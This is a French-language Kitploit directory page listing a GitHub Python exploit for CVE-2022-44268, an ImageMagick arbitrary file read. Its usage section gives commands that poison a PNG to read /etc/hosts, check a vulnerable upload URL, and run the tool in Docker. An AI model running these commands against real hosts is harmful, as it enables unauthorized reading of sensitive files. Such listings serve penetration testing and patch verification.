Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-44268 — Exploit basé sur Python pour CVE-2022-44268, une vulnérabilité de lecture arbitraire de fichiers dans ImageMagick. Empoisonne des images PNG pour lire des fichiers sensibles depuis des hôtes vulnérables via un téléchargement web. | Kitploit
Outils/GitHubGitHub/mouftan/cve-2022-44268
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsExploitation de Binaires
GitHubmouftan/cve-2022-44268

CVE-2022-44268

Exploit basé sur Python pour CVE-2022-44268, une vulnérabilité de lecture arbitraire de fichiers dans ImageMagick. Empoisonne des images PNG pour lire des fichiers sensibles depuis des hôtes vulnérables via un téléchargement web.

Voir le dépôt
110il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-44268 🧙‍♂️

CVE-2022-44268 Lecture Arbitraire de Fichier ImageMagick

Utilisation 🛠

Empoisonner l'image ☣️

python3 CVE-2022-44268.py --image imagetopoison.png --file-to-read /etc/hosts --output poisoned.png
Upload poisoned PNG image.

Vérifiez si l'exploit a réussi 🗡

python3 CVE-2022-44268.py --url http://vulnerable-imagemagick.com/uploads/vulnerable.png

Exécution avec Docker 🐳

Build

docker build -t cve-2022-44268 .

Run

docker run -v $(pwd)/data:/data -ti cve-2022-44268 --image /data/random.png --file-to-read "/etc/hosts" --output /data/poisoned.png

Paramètres 🧰

ParamètreDescriptionType
--urlL'URL de l'image PNG téléchargéeChaîne
--imageFichier PNG d'entréeFichier
--outputFichier PNG de sortieFichier
--file-to-readFichier à lire depuis l'hôte vulnérableChaîne
Télécharger l’outil